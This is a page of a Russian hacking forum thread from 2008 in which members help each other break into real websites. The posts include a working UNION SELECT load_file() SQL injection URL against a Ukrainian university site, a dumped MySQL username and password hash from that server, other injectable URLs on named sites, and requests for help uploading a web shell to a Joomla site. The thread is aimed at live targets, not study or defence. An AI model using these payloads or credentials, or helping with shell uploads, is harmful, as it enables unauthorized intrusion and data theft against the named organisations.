ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 408 из 1393 « Первая < 308358398 404 405 406 407 408 409 410 411 412 418458508908 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4071  
Старый 09.12.2008, 05:34
Korney
Новичок
Регистрация: 10.08.2007
Сообщений: 26
Провел на форуме:
239619

Репутация: 38
По умолчанию
Tigger тебя интересует реальный путь к серверу ?
 
Ответить с цитированием

  #4072  
Старый 09.12.2008, 06:10
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
2 Tigger:

http://kpi.ua/board/index.php?action=list_messages&section_id=2&module =1'

Цитата:
/usr/hosting/www.ntu-kpi.kiev.ua/data/common/include-board/Query.class
mysql user:
hellcat
-------
mysql password:
*155D9B0E48F5A1A1981B225E4C8D9C2A2A87E608
-------
file_priv:
Y
Последний раз редактировалось Pashkela; 09.12.2008 в 06:35..
 
Ответить с цитированием

  #4073  
Старый 09.12.2008, 09:39
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Цитата:
Сообщение от Pashkela  
2 Tigger:

http://kpi.ua/board/index.php?action=list_messages&section_id=2&module =1'



mysql user:
hellcat
-------
mysql password:
*155D9B0E48F5A1A1981B225E4C8D9C2A2A87E608
-------
file_priv:
Y
mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/
 
Ответить с цитированием

  #4074  
Старый 09.12.2008, 10:02
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
Цитата:
Сообщение от Tigger  
mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/
http://kpi.ua/job/index.php?action=list_messages&section_id=-3+union+select+load_file('/usr/hosting/www.ntu-kpi.kiev.ua/data/common/include-board/Query.class')/*
какой же это бред? ...повезло..даже ковычГи проходят...исчи папку для записи..и го шелл...
 
Ответить с цитированием

  #4075  
Старый 09.12.2008, 12:59
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Цитата:
Сообщение от Tigger  
mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/
Путь реальный, просто надо найти папку с соответствующими правами
 
Ответить с цитированием

  #4076  
Старый 09.12.2008, 16:34
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию
Подскажите, как такую SQL- инъекцию раскрутить:
Цитата:
http://eve-zone.ru/?mode=quest&submode=0&s=1&p=-1
Не получается подобрать кол-во полей, все время ошибка вылазит..
 
Ответить с цитированием

  #4077  
Старый 09.12.2008, 16:37
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
Thrasher88
Цитата:
Подскажите, как такую SQL- инъекцию раскрутить:
inj в LIMIT, не раскрутишь... =\
 
Ответить с цитированием

  #4078  
Старый 09.12.2008, 16:48
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию
А вот эта:
Цитата:
http://www.xyligan.ru/blogs/blog.php?readpost=-1'
Вроде бы что то схожее...
 
Ответить с цитированием

  #4079  
Старый 09.12.2008, 17:34
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Цитата:
Сообщение от Pashkela  
Путь реальный, просто надо найти папку с соответствующими правами
А где ты нашел этот реальный путь? В каких конфигах?
Да и чего-то ничего не получается(( Всякие разные папки попробывал(( Ни выходить никак
Последний раз редактировалось Tigger; 09.12.2008 в 17:38..
 
Ответить с цитированием

  #4080  
Старый 09.12.2008, 18:48
cric.cric
Познающий
Регистрация: 02.06.2008
Сообщений: 52
Провел на форуме:
218331

Репутация: 10
Smile
Доброе время суток!
Что можно с этим сделать есть скул иньекция на этом сайте !
Движок jomla версия помоему либо 1.1 либо 5.2.1
http://aing.kz/index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql]
Кто может помочь как залить шел или что-то плиз помогите!

А еше забыл еше отметить вход админ ку можно через http://aing.kz/administrator
Заранее спасибо!
Последний раз редактировалось cric.cric; 09.12.2008 в 19:20..
 
Ответить с цитированием
Ответ
Страница 408 из 1393 « Первая < 308358398 404 405 406 407 408 409 410 411 412 418458508908 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ